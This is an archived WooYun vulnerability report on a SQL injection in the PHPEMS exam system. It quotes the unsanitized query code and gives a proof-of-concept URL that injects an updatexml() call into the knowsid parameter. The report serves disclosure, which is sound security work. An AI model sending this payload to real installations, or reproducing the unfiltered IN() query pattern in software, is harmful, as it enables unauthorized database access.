漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0100992
漏洞标题:PHPEMS一处SQL注入漏洞
相关厂商:PHPEMS
漏洞作者: 路人甲
提交时间:2015-03-13 10:14
修复时间:2015-04-30 18:48
公开时间:2015-04-30 18:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
PHPEMS一处SQL注入漏洞
详细说明:
8.PHPEMS某处SQL注入漏洞
存在注入漏洞的代码位置是/app/exam/phone.php的exercise()函数中
具体存在漏洞地方位于239行附近
$numbers[$p['questid']] = intval(ceil($this->exam->getQuestionNumberByQuestypeAndKnowsid($p['questid'],$knowids)));
这里getQuestionNumberByQuestypeAndKnowsid第二个参数$knowids是完全可控的
进入函数内部
public function getQuestionNumberByQuestypeAndKnowsid($questype,$knowsid)
{
if(!$knowsid)$knowsid = '0';
$data = array("count(*) AS number",array('questions','quest2knows'),array("questions.questiontype = '{$questype}'","questions.questionparent = 0","questions.questionstatus = 1","questions.questionid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 0"),false,false,false);
$sql = $this->sql->makeSelect($data);
$r = $this->db->fetch($sql);
$data = array("sum(qrnumber) AS number",array('questionrows','quest2knows'),array("questionrows.qrtype = '{$questype}'","questionrows.qrstatus = 1","questionrows.qrid = quest2knows.qkquestionid","quest2knows.qkknowsid IN ({$knowsid})","quest2knows.qktype = 1"),false,false,false);
$sql = $this->sql->makeSelect($data);
$m = $this->db->fetch($sql);
return $r['number']+$m['number'];
}
没有进行任何过滤就参与SQL语句整合了,于是产生了SQL注入漏洞
验证过程
注册用户,登录之
访问localhost/ems/index.php?exam-phone-exercise-ajax-getQuestionNumber&knowsid=1,updatexml(1,user(),1)
即可验证。
验证无误
漏洞证明:
注册用户,登录之
访问localhost/ems/index.php?exam-phone-exercise-ajax-getQuestionNumber&knowsid=1,updatexml(1,user(),1)
即可验证。
验证无误
修复方案:
严格过滤参数吧
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝